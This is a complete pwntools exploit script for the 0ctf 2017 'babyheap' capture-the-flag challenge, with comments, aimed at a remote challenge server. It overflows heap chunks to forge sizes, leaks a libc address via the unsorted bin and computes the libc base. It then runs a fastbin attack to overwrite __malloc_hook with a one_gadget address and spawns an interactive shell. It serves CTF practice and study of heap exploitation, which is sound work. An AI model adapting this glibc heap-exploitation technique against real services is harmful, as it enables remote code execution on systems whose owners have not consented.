from pwn import *
#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})
# Binary and the libc it is served with; only `libc` is used for symbol
# lookups below, `elf` is loaded but not otherwise read in this script.
elf = ELF('./0ctf_2017_babyheap')
libc = ELF("./libc-2.23.so")
# Remote challenge instance; the commented-out process() line above is the
# local alternative and shares the same `p` name.
p = remote(host="node3.buuoj.cn", port=26165)
def Allocate(size):
    """Menu option 1: ask the service for a chunk of `size` bytes.

    Only drives the prompts; nothing is read back, so the index the
    service assigns is tracked by hand in the caller's `#N` comments.
    """
    p.sendlineafter('Command: ', '1')
    p.sendlineafter('Size: ', str(size))
def Fill(idx, content):
    """Menu option 2: write `content` into the chunk held at `idx`.

    The size field sent to the service is always len(content); the
    caller is responsible for how that relates to the chunk's requested
    size.
    """
    p.sendlineafter('Command: ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(len(content)))
    p.sendlineafter('Content: ', content)
def Free(idx):
    """Menu option 3: release the chunk held at `idx`. Reads no reply."""
    p.sendlineafter('Command: ', '3')
    p.sendlineafter('Index: ', str(idx))
def Dump(idx):
    """Menu option 4: have the service print the chunk held at `idx`.

    The dumped bytes are left on the connection for the caller to parse.
    """
    p.sendlineafter('Command: ', '4')
    p.sendlineafter('Index: ', str(idx))
# Six allocations; the trailing "#N" is the index the author expects the
# service to hand back (Allocate() never reads it, so these are tracked by hand).
Allocate(0x10) #0
Allocate(0x10) #1
Allocate(0x80) #2
Allocate(0x10) #3
Allocate(0x68) #4
Allocate(0x10) #5
# Index 0 was requested with 0x10 bytes but receives 32 here (24 filler
# bytes plus one packed qword); Fill() sends len(content) as the size, so
# this only works if the service does not bound that length — not
# verifiable from this script alone, confirm against the binary.
Fill(0,'a'*24+p64(0xb1))
Free(1)
Allocate(0xa0) #1
Fill(1,'b'*24+p64(0x91))
Free(2)
Dump(1)
# Leak parse: everything up to the first 0x7f byte is consumed and the last
# 6 bytes are taken as a little-endian pointer. Fragile: recvuntil matches
# the whole stream, so any earlier 0x7f byte in menu text or data mis-aligns
# the slice and yields a wrong address without an error.
mainarea88 = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success(hex(mainarea88))
# The subtrahend is a delta between two addresses copied from one run
# (presumably the leaked pointer and that run's libc base), so it is tied to
# ./libc-2.23.so and to that session; a different build gives a silently
# wrong libcbase.
libcbase = mainarea88 - (0x7f9b47a14b78-0x7f9b47650000)
log.success(hex(libcbase))
malloc_hook = libcbase + libc.symbols['__malloc_hook']
log.success(hex(malloc_hook))
# Hard-coded file offset, not looked up through `libc`; it is specific to
# this exact libc build and is not checked in any way.
one_gadget = libcbase + 0x4526a
Free(4) #4
# Again 24 filler bytes followed by two packed qwords (a 0x71 value and
# malloc_hook-0x23) written through index 3.
Fill(3,'c'*24+p64(0x71)+p64(malloc_hook-0x23))
Allocate(0x68) #2
Allocate(0x68) #4
# The 0x13 bytes of padding are paired with the -0x23 above; the two
# constants must be changed together.
Fill(4,'\x00'*0x13+p64(one_gadget))
# One more allocation, then the connection is handed to the terminal.
Allocate(0x10)
p.interactive()